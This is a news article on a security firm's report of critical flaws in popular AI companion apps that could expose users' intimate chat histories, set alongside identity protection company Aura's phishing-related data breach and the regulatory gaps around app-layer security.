Aura breach and AI companion app flaws sharpen privacy fears

A new security report on AI girlfriend and companion apps is drawing added attention because it arrives just as identity protection company Aura is dealing with its own data exposure incident, underscoring the broader risk of companies collecting intimate user information and failing to fully protect it.
Aura said an unauthorized party accessed about 900,000 records after a targeted phone phishing attack on an employee, while the companion app report says 17 popular Android apps with a combined 150 million plus installs contain 14 critical flaws and 311 high severity issues, including vulnerabilities that could expose users’ erotic chat histories.
According to the report, published by mobile application security company Oversecured, the problem is not simply that these apps are popular, but that they are built around some of the most sensitive disclosures users make anywhere online.
Oversecured says the apps it examined include products explicitly marketed as AI girlfriends, AI boyfriends, dating simulators, and roleplay platforms, while several others present themselves more broadly as character or chat apps but still host large volumes of romantic and sexual roleplay.
The report says users disclose explicit sexual content, relationship problems, sexual orientation, suicidal thoughts, and domestic conflicts, and that these conversations are often stored server-side and in some cases cached locally on users’ devices.
Oversecured says ten of the 17 apps it reviewed contained flaws that create a path to users’ conversation histories, and six of those apps had critical vulnerabilities specifically capable of exposing chat data.
Three of those six apps had more than 10 million downloads each, and one had more than 50 million downloads, according to the report.
The company says the most severe findings included hardcoded cloud credentials embedded in app code, a cross-site scripting flaw that would allow code injection directly into a chat interface, and a file theft vulnerability in an app known for not safe for work content.
The report lays out how those flaws could work in practice.
In one 10 million download app, Oversecured says it found both an OpenAI API token and a Google Cloud service account private key hardcoded in the APK, potentially allowing access not only to the app’s AI backend but also to billing infrastructure and, if stored in the same cloud project, the full chat database.
In another 10 million download app, a cross-site scripting flaw in an exported WebView could allegedly let an attacker inject JavaScript into the chat interface, read conversations on screen in real time, steal session tokens tied to full server-side histories, and inject fake messages into what users believe is a private exchange.
In a separate 1 million download app, Oversecured says an arbitrary file theft flaw could expose local chat databases, cached photos, voice messages, and authentication tokens.
The report also points to a supply chain style risk in one app with more than 50 million installs.
Oversecured says an ad software development kit allowed arbitrary component launch and content provider access, which in turn could permit direct queries to internal conversation tables through a malicious ad creative.
In another app with more than ten million installs, Oversecured says arbitrary component launch combined with a hardcoded token could expose authentication and session data or redirect users to an attacker-controlled phishing page made to resemble a legitimate app screen.
Oversecured argues that the findings fit a pattern rather than an isolated problem.
The report cites two previous AI companion-related exposures. One in October 2025 involved Chattee Chat and GiMe Chat which exposed 43 million messages and 600,000 photos from more than 400,000 users through an unprotected server.
In February of this year, another AI chat app exposed 300 million messages from 25 million users through a Firebase misconfiguration.
Oversecured says the vulnerabilities it found, including hardcoded credentials, injectable WebViews, and file access flaws, can lead to the same kind of large-scale exposure.
A central point of the report is that these apps sit in what it called a regulatory blind spot.
Oversecured says no regulator in any jurisdiction has yet taken enforcement action against an AI companion app for application layer security flaws, even though regulators have investigated or sanctioned some of the same companies over privacy disclosures, age verification, and child safety.
The report notes that the Federal Trade Commission (FTC) sent compulsory information orders to Alphabet, Character Technologies, Instagram, Meta Platforms, OpenAI OpCo, Snap, and X.AI Corp. in September 2025, but that the inquiry focused on harms to children rather than how companion apps store and secure conversation data.
The FTC said it wanted to know what steps companies had taken to evaluate chatbot safety, limit harmful effects on minors, restrict children’s or teens’ use where appropriate, and comply with the Children’s Online Privacy Protection Act Rule.
Oversecured also pointed to new California and New York laws requiring disclosures and suicide prevention measures, and to Italy’s €5 million fine against Replika’s developer over GDPR-related violations as examples of governments acting on privacy and youth protection issues without squarely addressing app layer security.
The Aura incident gives that argument more immediate resonance. Aura said the unauthorized access affected data in a marketing tool associated with a company it acquired in 2021 and that fewer than 20,000 active Aura customers and fewer than 15,000 former customers were affected.
The company said no database supporting its identity theft protection application was accessed and that no Social Security numbers, financial information, credit records, or passwords were compromised.
Have I Been Pwned, a public breach notification service that lets you check whether your email address has appeared in known data breaches, added the breach to its database, saying the exposed data included 900,000 unique email addresses and could also include names, phone numbers, physical and IP addresses, and customer service comments.
The Aura breach did not involve AI companions or erotic chat histories, but together the two incidents sharpen the concern about what happens when companies persuade users to hand over highly personal information and then fail to secure every layer of the systems that store it.
In the case of AI companion apps, Oversecured’s answer is that the consequences could be especially severe because the compromised material may include sexual conversations, confessions, emotional dependency, and records tied to real user identities.
The report says that while regulators have focused on who should use these apps and what harms they may cause, they have not yet dealt with the simpler and more basic issue of whether the apps can keep those conversations private.
Article Topics
chatbots | cybersecurity | data privacy | data protection | identity theft





Comments